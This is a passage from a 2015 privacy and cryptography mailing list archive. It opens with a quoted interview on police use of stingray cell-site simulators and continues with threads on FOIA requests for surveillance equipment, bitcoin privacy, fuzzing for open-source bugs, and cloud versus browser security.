to gather > international mobile subscriber identity (IMSI), location and other > data from mobile phones connecting to them. Pictured here is an actual > cell tower in Palatine, Ill. > > > Given the amount of mobile phone traffic that cell phone towers > transmit, it is no wonder law enforcement agencies target these > devices as a rich source of data to aid their investigations. Standard > procedure involves getting a court order to obtain phone records from > a wireless carrier. When authorities cannot or do not want to go that > route, they can set up a simulated cell phone tower—often called a > stingray—that surreptitiously gathers information from the suspects in > question as well as any other mobile device in the area. > > These simulated cell sites—which collect international mobile > subscriber identity (IMSI), location and other data from mobile phones > connecting to them—have become a source of controversy for a number of > reasons. National and local law enforcement agencies closely guard > details about the technology’s use, with much of what is known about > stingrays revealed through court documents and other paperwork made > public via Freedom of Information Act (FOIA) requests. > > One such document recently revealed that the Baltimore Police > Department has used a cell site simulator 4,300 times since 2007 and > signed a nondisclosure agreement with the FBI that instructed > prosecutors to drop cases rather than reveal the department’s use of > the stingray. Other records indicate law enforcement agencies have > used the technology hundreds of times without a search warrant, > instead relying on a much more generic court order known as a pen > register and trap and trace order. Last year Harris Corp., the > Melbourne, Fla., company that makes the majority of cell site > simulators, went so far as to petition the Federal Communications > Commission to block a FOIA request for user manuals for some of the > company’s products. > > The secretive nature of stingray use has begun to backfire on law > enforcement, however, with states beginning to pass laws that require > police to obtain a warrant before they can set up a fake cell phone > tower for surveillance. Virginia, Minnesota, Utah and Washington State > now have laws regulating stingray use, with California and Texas > considering similar measures. Proposed federal legislation to prevent > the government from tracking people’s cell phone or GPS location > without a warrant could also include stingray technology. > > Scientific American recently spoke with Brian Owsley, an assistant > professor of law at the University of North Texas Dallas College of > Law, about the legal issues and privacy implications surrounding the > use of a stingray to indiscriminately collect mobile phone data. Given > the invasive nature of the technology and scarcity of laws governing > its use, Owsley, a former U.S. magistrate judge in Texas, says the > lack of reliable information documenting the technology’s use is > particularly troubling. > > > [An edited transcript of the interview follows.] > > When and why did law enforcement agencies begin using international > cell site simulators to intercept mobile phone traffic and track > movement of mobile phone users? > > Initially, intelligence agencies—CIA and the like—couldn’t get local > or national telecommunications companies in other countries to > cooperate with U.S. surveillance operations against nationals in those > countries. To fill that void companies like the Harris Corp. started > creating cell site simulators for these agencies to use. Once Harris > saturated the intelligence and military markets [with] their products, > they turned to federal agencies operating in the U.S. So the [Drug > Enforcement Administration], Homeland Security, FBI and others started > having their own simulated cell sites to use for surveillance. > Eventually this trickled down further to yet another untapped market: > state and local law enforcement. That’s where we are today in terms of > the proliferation of this technology. > > > Under what circumstances do U.S. law enforcement agencies use cell > site simulators and related technology? > > There are three examples of how law enforcement typically use > stingrays for surveillance: First, law enforcement officials may use > the cell site simulator with the known cell phone number of a targeted > individual in order to determine that individual's location. For > example, officials are searching for a fugitive and have a cell phone > number that they believe the individual is using. They may operate a > stingray near areas where they believe that the individual may be, > such as a relative's home. > > Second, law enforcement officials may use the stingray to target a > specific individual who is using a cell phone, but these officials do > not know the cell phone number. They follow the targeted individual > from a site to various other locations over a certain time period. At > each new location, they activate the stingray and capture the cell > phone data for all of the nearby cell phones. After they have captured > the data at a number of sites they can analyze the data to determine > the cell phone or cell phones used by the targeted individual. This > approach captures the data of all nearby cell phones, including > countless cell phones of individuals unrelated to the criminal > investigation. > > Third, law enforcement officials have been known to operate stingray > at political rallies and protests. Using the stingray at these types > of events captures the cell phone data of everyone in attendance. > > > How does law enforcement get permission to perform this type of > surveillance? > > Federal law enforcement agencies typically get courts to approve use > of something like stingray through a pen register application [a pen > register is a device that records the numbers called from a particular > phone line]. With that type of application, essentially the government > says, we want this information. We think it’s going to be relevant to > an ongoing criminal investigation. As you can imagine, that’s a pretty > low bar for them to satisfy in the eyes of the court. Just about > anything could fit into that description. You don’t even have to show > that such an investigation would lead to an arrest or prosecution. Law > enforcement is telling the court, look, we’re in the middle of this > investigation. If we get this information, we think it might lead to > some other important information. > > Different court orders have different standards for approval. The > highest standard would be for a wiretap. A search warrant likewise has > a much higher standard than a pen register, requiring law enforcement > to prove probable cause before a judge will grant permission to use > additional means of investigation. The problem that I have with a pen > register to justify use of something like a stingray is that the > standard for a pen register is much too low, given the invasive nature > of a pen register. Instead, I think the use of a stingray should be > consistent with the Fourth Amendment of the Constitution and pursuant > to a search warrant. > > > Why not explicitly state the type of technology being used and its > specific purpose when filing for a court order? > > [When] law enforcement agencies seek to obtain judicial authorization > through a pen register, they do not directly indicate that they are > applying for authorization to use a stingray. Doing so might cause > some courts to question whether the pen register statute [as opposed > to some higher standard] is the appropriate basis for authorizing a > stingray. In addition, law enforcement agencies typically have to sign > nondisclosure agreements with Harris Corp. in order to receive the > federal Homeland Security funding needed to purchase the technology. > So there’s this concern, at least at the local law enforcement level, > about revealing any information about it because that would violate > the agreement with Harris and maybe subject them to losing the > equipment or some other consequences. > > > Why would law enforcement agencies sign a nondisclosure agreement with > a technology company? > > I’m not sure whether the agreements are being driven by the FBI or by > Harris, but these agreements seem to be getting less relevant insofar > as [there is less] need to keep the public unaware of the existence of > this technology. In the last three or so years there’s been a lot more > awareness about the technology and its use. When agencies were first > signing these agreements years ago, use of this technology wasn’t > widely known. Now you are getting situations where criminal defense > attorneys learn about stingray and similar technologies and the role > they may be playing in the arrests of some of their clients. Defense > teams are starting to ask questions and require the government to > produce documentation such as court orders, and that’s creating the > confrontation you’re now seeing. > > > Why have law enforcement agencies kept their use of cell site > simulators so secretive? > > Some of it is the cloudy legal issues surrounding the legitimate uses > of this technology. Law enforcement agencies will also argue that the > more information that’s available about this technology, the harder it > is for them to use these devices to fight crime. Yet there’s a growing > knowledge of this technology, and a serious criminal enterprise is > already aware of it. People are already using prepaid disposable > phones [sometimes referred to as “burner phones”] to some extent to > defeat this technology. Sophisticated criminals are aware that there’s > electronic surveillance out there in myriad ways, and so they’re going > to take precautions. From a technology perspective, it’s sort of a > cat-and-mouse game. There’s also a device that locates cell site > simulators, something referred to as an IMSI catcher. There’s an arms > race back and forth to get the best technology and to get the edge. > > > What does it say to you about the whole process that a prosecutor or a > law enforcement agency is willing to sacrifice a conviction in order > to keep their methods a secret? > > I think it’s a very odd approach. You are throwing away some > convictions or potential convictions for the sake of secrecy. But it’s > even harder to understand now that knowledge of the technology is > becoming so common. There have been documented cases in Baltimore and > Saint Louis where stingray has supposedly been used. The use of > stingray and related technologies is a roll of the dice in the sense > that law enforcement is hoping that either the defense attorneys don’t > have enough savvy or wherewithal to find out about the technology and > ask the right questions or, even if that does happen, they’re hoping > that the judge that they have is favorable to their approach and not > going to order them to reveal information about its use. In the rare > occasions when things go against them, they just dismiss it. > > > You yourself denied a law enforcement application three years ago to > use a stingray. Under what circumstances would you approve its use? > > I want to make clear: I don’t have a problem with stingray itself—I > understand that this can be a valuable tool in law enforcement’s > arsenal. My problem is that I want it to be used pursuant to a high > standard of proof that it’s needed, and that I want the approval > process to be more transparent. One of the reasons I’d like to see > some more documentation of stingray applications and orders is because > I have this suspicion—but there’s no way of confirming it one way or > another—that some judges are signing approvals to use this technology > thinking that they’re just signing a pen register. If a judge thinks > it’s [just] another pen register application, they’re just going to > sign it without giving it much pause. > > > Now that the use of this stingrays and related technologies has been > made public, where will this issue be a year or a few years from now? > > A year from now I think we’re in the same position. You’re dealing > with outdated statutes concerning new and very different technology. > It’s possible in five years maybe that Congress will step in and do > something. More likely, state legislatures will take most of the > action to monitor this type of surveillance. Washington State, > California [and others] have already acted, and Texas is evaluating > the standards for approving stingray use. > From coderman at gmail.com Wed Jul 15 02:16:24 2015 From: coderman at gmail.com (coderman) Date: Wed, 15 Jul 2015 02:16:24 -0700 Subject: Why do people still use Google services? (was Re: Encryption Rights - A Google+ community) In-Reply-To: References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> Message-ID: On 7/15/15, Seth wrote: > ... > I've come to the conclusion that almost without exception, people will opt > for convenience over privacy and dignity. you should know that convenient and vulnerable is subsidized by the billions, advertisers and intelligence spooks all the same, same as it ever was... [ so worse that predisposition, you've got active adversary on top! ] fun problems :) best regards, From coderman at gmail.com Wed Jul 15 02:37:22 2015 From: coderman at gmail.com (coderman) Date: Wed, 15 Jul 2015 02:37:22 -0700 Subject: [cryptome] Re: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: and three appeals of rejected @FBI: (my first appeal(s)! :) "The number of Digital Receiver Technology units model DRT 1201 used by, or owned or leased by the agency." - https://www.muckrock.com/foi/united-states-of-america-10/drtbox-18541/ "The number of Harris Corporation KingFish systems/devices used by, or owned or leased by the agency." - https://www.muckrock.com/foi/united-states-of-america-10/kingfishing-18594/ "Any and all SKUs, Contracts, Invoices, Receipts, Billing Numbers, Agreements, PO Numbers, for any services or goods purchased from Boeing Corporation, including third party contract hours for training or related services, regarding hardware to include Digital Signal Processing (DSP) or Cell-site Simulators or Software Defined Radio (SDR) base-stations, or Stingray-like pen/trace-trap devices, or other radio surveillance technology, including technology formerly produced by Digital Receiver Technology, Inc., also known as DRT Systems, now part of Boeing, known to include the DRTBox, or DirtBox, or DirtBoxes surveillance gear. Please include antenna systems and cable hardware, as part of the radio systems to report on." - https://www.muckrock.com/foi/united-states-of-america-10/drtbeboeingbox-18708/ From mirimir at riseup.net Wed Jul 15 01:44:40 2015 From: mirimir at riseup.net (Mirimir) Date: Wed, 15 Jul 2015 02:44:40 -0600 Subject: Why do people still use Google services? (was Re: Encryption Rights - A Google+ community) In-Reply-To: References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> Message-ID: <55A61D78.6090101@riseup.net> On 07/15/2015 01:21 AM, Seth wrote: > Let’s get serious. These companies [Apple and Google] are both as good > or as bad as we allow them to be. There is no hero here. In the immortal > words of John Adams, > > There is nothing which I dread so much as a division of the republic > into two great parties, each arranged under its leader, and concerting > measures in opposition to each other. This, in my humble apprehension, > is to be dreaded as the greatest political evil under our Constitution. Apple = AOL Google = CompuServe From odinn.cyberguerrilla at riseup.net Wed Jul 15 03:37:39 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Wed, 15 Jul 2015 03:37:39 -0700 Subject: Bitcoin exchanges. In-Reply-To: References: Message-ID: <55A637F3.2020401@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Don't use BitPay, Coinbase, Circle. You may, however, wish to try https://www.bitwage.co/ (or you might not) Note: This is not me providing any endorsement for bitwage, but there is an article about someone's experience with it here: https://open.bufferapp.com/getting-paid-in-bitcoin/ Re. your "untraceable" remarks, bitcoin is not untraceable. It's basically transparent. There are a few things that have been added recently to enhance privacy, but sorry, not untraceable or anonymous or anything like that. The things that _you_ can do to enhance the privacy on your side are: Don't use web wallets (with the possible exception of Coinkite, if you are comfortable using it...) Do use hardware wallet (e.g. Trezor) or something you can install and manage from your laptop (e.g. Electrum) (Note that these don't require you to sign up for a service with anyone.) If you have accounts with Coinbase, BitPay, or other firms with web-based wallet servic(es) that are bound by AML/KYC, TISA, FATCA, a growing body of FINCEN and state-by-state requirements, you are better off just transferring your coins away from those firms and closing your accounts. Don't use Coinbase or BitPay as a payment processor if you are a business, instead consider Mycelium Gear -- gear.mycelium.com -- or Coinsimple - discussed at https://www.reddit.com/r/Bitcoin/comments/35evi0/eli5_difference_between _mycelium_gear_and/ On 07/08/2015 06:20 AM, uwecerron at gmail.com wrote: > I thought bitpay had a payroll option. > > Sent from my iPhone > > On Jul 8, 2015, at 8:41 AM, Edd thompson > wrote: > >> Is there and way a person can get their paycheck direct deposit >> to a Bitcoin? So instead of a deposit to a checking account it >> goes to an exchange that converts it for you? And then is there a >> good way to access currency in rural areas? I have seen a few >> videos and read overviews but they never get to how to make it >> practical for people not in big cities, hell it just doesn't seem >> practical at all unless you live near an exchange or are willing >> to do credit card transactions that cost on top of the exchange >> and make the currency traceable. >> - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVpjfyAAoJEGxwq/inSG8CCPwIAIeOXdysrrmUQfIx72X49BYP n3fE00bYgEBA2m/hGu1icMEDH0FHFYucngPppAKoISnMWqNdu0P+L4bHLhQdwPsa i19rw+L8EVqiFwDaSZ/N0uvsLAnb01kpCXOhJDb+QREAds/+WJA7x0DoGXP2zh5t NsLSrjT4CtyzOgf0fHACxr7TJyIniQqxpqbmKc5DQlnKDvWkRCTEwdipkprA9LNX DkkzIB5cRg3Kt7wxgUybQgwZSG8Q5jl9JagJCT7SQP9Ol+xzVrAmWTzNcSdb8icd C93nMyeIl5BGWhxyw0C6kEaWwguCIn/YdHshEp90aTCxwjTQ4kGB+j9qU22VvF8= =nBcY -----END PGP SIGNATURE----- From mirimir at riseup.net Wed Jul 15 04:57:40 2015 From: mirimir at riseup.net (Mirimir) Date: Wed, 15 Jul 2015 05:57:40 -0600 Subject: Bitcoin exchanges. In-Reply-To: <55A637F3.2020401@riseup.net> References: <55A637F3.2020401@riseup.net> Message-ID: <55A64AB4.2080902@riseup.net> On 07/15/2015 04:37 AM, odinn wrote: > Re. your "untraceable" remarks, bitcoin is not untraceable. It's > basically transparent. There are a few things that have been added > recently to enhance privacy, but sorry, not untraceable or anonymous > or anything like that. | China-based Bitcoin exchange Bter has announced that it will | continue to operate its service and pay back all its users in | time, following a cyberattack that saw the company lose $1.75 | million in cryptocurrency to hackers. | | Bter says that it managed to trace the stolen 7,170 BTC to a | Bitcoin mixer (a cryptocurrency laundering service) called | Bitcoin Fog, but hasn’t heard from the company despite | repeated attempts to make contact. http://thenextweb.com/insider/2015/03/12/chinese-bitcoin-exchange-bter-will-pay-back-users-after-losing-1-75-million-in-cyberattack/ Bitcoin Fog is a Tor hidden service. If they can successfully launder 7170 BTC, that's good enough for me. From alfiej at fastmail.fm Tue Jul 14 15:11:23 2015 From: alfiej at fastmail.fm (Alfie John) Date: Wed, 15 Jul 2015 08:11:23 +1000 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> On Wed, Jul 15, 2015, at 01:52 AM, dan at geer.org wrote: > CxO: We have to prepare for the day when no software we depend on is run on premises. Zen Master: Then we have to prepare for the day that all adversaries know all our secrets. On hearing this, the CxO was enlightened. Alfie -- Alfie John alfiej at fastmail.fm From chgans at gna.org Tue Jul 14 16:42:14 2015 From: chgans at gna.org (Christian Gagneraud) Date: Wed, 15 Jul 2015 11:42:14 +1200 Subject: [Cryptography] Super-computer project wanted In-Reply-To: References: <55A53867.4090100@sonic.net> Message-ID: <55A59E56.5020206@gna.org> On 15/07/15 08:44, grarpamp wrote: >>>> dave at horsfall.org >>>> So, is there anything that could benefit from a few parallel > teraflops here and there? > > On Tue, Jul 14, 2015 at 12:27 PM, Ray Dillinger wrote: >> Or you could apply static code analysis software to huge >> masses of existing operating system, device driver, plugin, >> email-client or god-help-us browser code in wide use and >> see if you can't spot instances of dangerous vulnerabilities >> like buffer overflows. A list of known errors would be >> very helpful in getting code up to 'bulletproof' reliability >> and no one runs ALL the possible static analysis we know >> about on large bodies of code because it takes too long on >> regular computers. > > This, and fuzzing... of all the opensource OS's and all the > ported packages they supply. And dump all of github in it > for fun. FYI, the AFL fuzzer already have an impressing trophy case: See "The bug-o-rama trophy case" at http://lcamtuf.coredump.cx/afl/ > It takes too long, too much developer time, a different > skillset, opensource test suites may not yet cover some > areas that commercial ones do, etc. > > Ripe for development of an open perpetual audit project. > > That, and printing your own open and trusted chips, in your own > open and trusted fab, are possible now. It's big picture, grand slam, > full circle headiness, but it is doable. People just have to get > together and kick it off. > From coderman at gmail.com Wed Jul 15 14:31:21 2015 From: coderman at gmail.com (coderman) Date: Wed, 15 Jul 2015 14:31:21 -0700 Subject: Encryption Rights - A Google+ community In-Reply-To: <20150714094523.637C2C00027@frontend1.nyi.internal> References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> Message-ID: On 7/14/15, Shelley wrote: > ... > I'm glad it's not just me! That was my reaction too but I held back from > commenting, because I feel like I'm always bitching here about cpunks or > anyone interested in privacy still using google for any reason. I don't > understand it. valid ways to GOOG: - ironically; my favorite. gmail nicely expressing my contempt for email! - effectively; google play droid betas? gotta join the circle+jerk++ - side-channel-informationally; this only works if they fight NSL's and court orders for content and account metadata. - expediently; 8.8.8.8 and everywherecaches quite in-parallel convenient :) - yours? best regards, From odinn.cyberguerrilla at riseup.net Wed Jul 15 22:53:16 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Wed, 15 Jul 2015 22:53:16 -0700 Subject: Stuff Is Happening, Your Thoughts Sought On It Message-ID: <55A746CC.6030004@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, Over the course of the better part of a year, I've been communicating with BCN developers, and now, the ABIS microdonations concept (http://abis.io) will be implemented in the Bytecoin (BCN) Wallet after a Change Request is discussed and finalized. But before that happens, community discussion is needed on this change request draft. I seriously look forward to your thoughts on this stuff. Discussion: https://bytecointalk.org/showthread.php?tid=82 - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVp0bMAAoJEGxwq/inSG8C3MAIAIDL4HP4B2a7TrYFvXrp56KI 08TCKPBTuGBbZGZ2Z2tccKRu+QpeBqzynFjOSUFIGRui6k5/xyQCxxMlhgsHDGb+ EtU/qC2Q4Pb7JqeB4uPw40d3DfLrHe39K21MrK4tOx+jjBVYUILzvfipSr4T1NFL 6Y5bGIWHN81UftZCG5NmS1EbZfw5WqxKhJFwbAT2ndGXSJFbkFmJl8Jgkog8CUXI H1hCZdFdveCTyL/ggsk6T2ieOKAwP5qC110u8XwJnx2YrSyMP2qta6ZkzpVQSUVs 3lxhyzRUgTIJA+WBidmFJHWJb5M9ssHfhSgv0768z6QMCzmvq9qW8vhv+u4mhw8= =jCrh -----END PGP SIGNATURE----- From coderman at gmail.com Thu Jul 16 00:45:47 2015 From: coderman at gmail.com (coderman) Date: Thu, 16 Jul 2015 00:45:47 -0700 Subject: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: new reqs: "Count of "Hardware Security Module", "HSM", "Cryptographic Accelerator", or "VPN Accelerator" devices or equivalent in use or purchased by the department. This is to include devices which are incorporated into larger computing facilities such as databases, servers, switches, and routers. Please include processing notes for this request, even if request is denied in part." @FBI https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19755/ @CIA https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19756/ @DoJ https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19757/ @DoD-OIG https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19758/ @DoD-SecDef https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19759/ @DHS https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19760/ @USSS https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19761/ best regards, From grarpamp at gmail.com Wed Jul 15 23:15:01 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 16 Jul 2015 02:15:01 -0400 Subject: [tor-talk] Research - Black Market Archives In-Reply-To: <55A73676.2010703@metaverse.org> References: <55A73676.2010703@metaverse.org> Message-ID: > Gwern Branwen has scraped/mirrored on a weekly or daily basis all existing English-language Dark Net Markets as part of research into their usage, lifetimes/characteristics, & legal riskiness. > A torrent of the scraped data is now publicly released as a 52GB (~1.6TB) collection covering 89 DNMs & 37+ related forums, representing <4,438 mirrors, and can be found at . There were a few archivists active in the early days. Due to various reasons, their archives may never see the light of day. For those that still have some, the feeling of a finger hovering over rm is a rather intoxicating experience, and the nostalgia of pointing their browser at http://127.0.0.1/ is quite fine indeed :) Kudos Gwern on your publication. Over a decade's worth of other stories are certainly waiting to be told. From coderman at gmail.com Thu Jul 16 02:33:38 2015 From: coderman at gmail.com (coderman) Date: Thu, 16 Jul 2015 02:33:38 -0700 Subject: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: moar new reqs: "The number of "HotPlug" forensic power override devices or equivalent in use or purchased by the Bureau. This is to include official CRU® WiebeTech® HotPlug™ systems or equivalent forensic power override systems by other suppliers. Please include processing notes for this request, even if request is denied in part." @FBI https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19762/ @CIA https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19763/ @DEA https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19764/ @DHS https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19765/ @DoD-OIG https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19766/ @DoD-SecDef https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19767/ @USSS https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19768/ best regards, From sdw at lig.net Thu Jul 16 10:09:23 2015 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 16 Jul 2015 10:09:23 -0700 Subject: an ominous comment In-Reply-To: <55A567F3.1000006@m-o-o-t.org> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <55A567F3.1000006@m-o-o-t.org> Message-ID: <55A7E543.7010505@lig.net> On 7/14/15 12:50 PM, Peter Fairbrother wrote: > On 14/07/15 18:02, Stephen D. Williams wrote: >> Everything will be run in the cloud and browser because it is, overall, >> a better computation model. > > > > It is? Why? The browser provides a super feature / security / quality / portable baseline that is rapidly improving. Only a few alternatives come close and they all fall short in major ways: Qt (which greatly relies on browser tech now), Java & C#, Unity, UnReal, etc. Certain things are still better in those alternatives, but less and less. With Javascript optimization, ASM.js, SIMD.js, WebGL, etc., browsers have, for most purposes, resolved the computational gap while having massively better security stance. WebComponents, the new binary Javascript format, along with WebRTC, WebUSB, and other features, we're getting the cleanest app and platform model we've seen so far. The key architectural questions about remote communication involve security, efficiency, stability, portability, etc. While it isn't perfect, web tech provides a nice enough model for expressing the highest level logical communication needed in secure (enough for most purposes), flexible, efficient enough, and low latency enough for most purposes ways. Solutions like Swagger, Go, and other modern techniques are much cleaner and simpler than previous clunky solutions. Most of the most interesting web apps now run almost completely in the browser. The server side sends the original page and code, manages authentication, then acts mostly as a database with minimal logic. As long as the API doesn't rely solely on client-side validation and other things that could be gamed, it can still be secure. Because it's now easy to run the same code on the front and back, complex validation could be done on the front-end for low latency and the backend for actual security, for instance. There are plenty of things that could be better and will get better, but regardless the power & ease gap between web app development, for most situations, is only increasing. Emulating any substantial subset of browser-level UI and other features in a non-browser desktop app is nearly impossible now. > > > > -- Peter Fairbrother sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3026 bytes Desc: not available URL: From sdw at lig.net Thu Jul 16 10:14:18 2015 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 16 Jul 2015 10:14:18 -0700 Subject: an ominous comment In-Reply-To: <20150716145142.GA2610@sivokote.iziade.m$> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> Message-ID: <55A7E66A.9010403@lig.net> On 7/16/15 7:51 AM, Georgi Guninski wrote: > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: >> In a lot of ways, this is an elegant solution and could arguably be >> much more secure than desktop apps in Windows. Assuming your > Lol, is this positive or negative argument? > > it can hardly be less secure than windoze imho. Cypherpunks + Windows, what do you think? sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 873 bytes Desc: not available URL: From sdw at lig.net Thu Jul 16 10:17:51 2015 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 16 Jul 2015 10:17:51 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <55A7E73F.6070507@lig.net> On 7/14/15 10:35 AM, John Young wrote: > Cloud and browser together constitute the most invasive programs > since religion was invented and rewarded to absolve overrreaching > and abusive authority. You don't think ODBC (which was Microsoft's fault, via ANSI) was worse? CORBA? Windows itself? SMB file servers? We are in massively better shape than we used to be. > > Both cloud and browser are deliberately designed to mislead users > about their threats to privacy and security. Iterations, adjustments, > corrections of errors, automatic upgrades, official endorsements, > repeatedly easy hacks, futile hearings of maladies long known and > ignored, concentration of computer power, reduction of alternatives, > foretell disaster as if natural, expected, bearable, and better than > DIY, desktop, solo solutions, mavericks, and worst of all, openness. Even narrowly true levels of security are better than what we used to have. Certainly we need to keep getting better. > > Cloud and browser are like imperial dogma, what's good for the > empire operators is good for the people. Although cloud and > browser to succeed must have access to all the people's private > data to assure they remain peaceable. It's getting better. Fund Firefox to keep the pressure on. > > Sysadmins are the Cromwells, the Hacking Teams, the > Kasperskys, violating law with impunity. sdw > > > At 01:02 PM 7/14/2015, you wrote: >> Everything will be run in the cloud and browser because it is, overall, a better computation model. However, that doesn't >> preclude you from running a cloud locally. Although pretty much proprietary to Google & Amazon until recently, Docker et al and >> related VM/container management APIs that are mappable to all kinds of implementations will allow apps, administration, >> networking, etc. to be fluid between commercial and various types of private clouds. >> >> In a lot of ways, this is an elegant solution and could arguably be much more secure than desktop apps in Windows. Assuming your >> container system isn't running in Windows, which is becoming an option; one that I won't trust easily. >> >> sdw >> >> On 7/14/15 8:52 AM, dan at geer.org wrote: >>> >>> Discussing security policy post-OPM debacle in a setting to >>> which >>> I have access (sorry to be oblique), it was said by a CxO "We have >>> to prepare for the day when no software we depend on is run on >>> premises." >>> >>> I did not handle this well (think sputtering as an alternative to >>> white rage). At the same time, I am probably in a bubble in that >>> I suspect that nearly everyone I see with a computer (of any form >>> factor) is already in that situation or, save for Javascript piped >>> in from the cloud to run locally, soon will be -- denizens of this >>> list and a few others excepted. >>> >>> Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, >>> perhaps, "Is anything to be done?" >>> >>> --dan >> -- Stephen D. Williams sdw at lig.net stephendwilliams at gmail.com LinkedIn: http://sdw.st/in V:650-450-UNIX (8649) V:866.SDW.UNIX V:703.371.9362 F:703.995.0407 AIM:sdw Skype:StephenDWilliams Yahoo:sdwlignet Resume: http://sdw.st/gres Personal: http://sdw.st facebook.com/sdwlig twitter.com/scienteer -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5453 bytes Desc: not available URL: From sdw at lig.net Thu Jul 16 10:28:20 2015 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 16 Jul 2015 10:28:20 -0700 Subject: an ominous comment In-Reply-To: <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> Message-ID: <55A7E9B4.6030307@lig.net> On 7/14/15 3:11 PM, Alfie John wrote: > On Wed, Jul 15, 2015, at 01:52 AM, dan at geer.org wrote: >> CxO: We have to prepare for the day when no software we depend on is run on premises. > Zen Master: Then we have to prepare for the day that all adversaries > know all our secrets. > > On hearing this, the CxO was enlightened. Sharing all of your secrets, then prosecuting adversaries that make ill use of it, in court and the court of public opinion, is a valid path. Better, throw in some misinformation so that they are mislead in self-sabotaging ways. If you are speaking on a line that you know is being recorded by "authorities", what should you be talking about? In the US at least, perhaps something that would make listeners blush or spend time chasing phantoms or something. Might as well get your money's worth. At some point I realized that I should just go to court for every ticket or other opportunity. If the alternative is that you certainly have to pay, then you might as well learn, get comfortable protecting yourself in court, say your peace, and try whatever legal argument you can think of. I have about a 50% win rate. Interesting how certain companies, Apple, feel they need to be totally opaque while others, Google and others, are closer to being mostly open. Space-X and/or Tesla are giving away free use of some patents, a somewhat related example. > Alfie > sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2228 bytes Desc: not available URL: From chgans at gna.org Wed Jul 15 15:46:58 2015 From: chgans at gna.org (Christian Gagneraud) Date: Thu, 16 Jul 2015 10:46:58 +1200 Subject: [Cryptography] Super-computer project wanted In-Reply-To: <55A59E56.5020206@gna.org> References: <55A53867.4090100@sonic.net> <55A59E56.5020206@gna.org> Message-ID: <55A6E2E2.7030101@gna.org> On 15/07/15 11:42, Christian Gagneraud wrote: > On 15/07/15 08:44, grarpamp wrote: >>>>> dave at horsfall.org >>>>> So, is there anything that could benefit from a few parallel >> teraflops here and there? >> >> On Tue, Jul 14, 2015 at 12:27 PM, Ray Dillinger wrote: >>> Or you could apply static code analysis software to huge >>> masses of existing operating system, device driver, plugin, >>> email-client or god-help-us browser code in wide use and >>> see if you can't spot instances of dangerous vulnerabilities >>> like buffer overflows. A list of known errors would be >>> very helpful in getting code up to 'bulletproof' reliability >>> and no one runs ALL the possible static analysis we know >>> about on large bodies of code because it takes too long on >>> regular computers. >> >> This, and fuzzing... of all the opensource OS's and all the >> ported packages they supply. And dump all of github in it >> for fun. > > FYI, the AFL fuzzer already have an impressing trophy case: > See "The bug-o-rama trophy case" at http://lcamtuf.coredump.cx/afl/ And here is a blog post about the future of the Linux Trinity fuzzer, used by Hacking Team to fuzz Android IOCTL. "I’m done enabling assholes." http://codemonkey.org.uk/2015/07/12/future-trinity/ Chris > >> It takes too long, too much developer time, a different >> skillset, opensource test suites may not yet cover some >> areas that commercial ones do, etc. >> >> Ripe for development of an open perpetual audit project. >> >> That, and printing your own open and trusted chips, in your own >> open and trusted fab, are possible now. It's big picture, grand slam, >> full circle headiness, but it is doable. People just have to get >> together and kick it off. >> > From drwho at virtadpt.net Thu Jul 16 10:52:00 2015 From: drwho at virtadpt.net (The Doctor) Date: Thu, 16 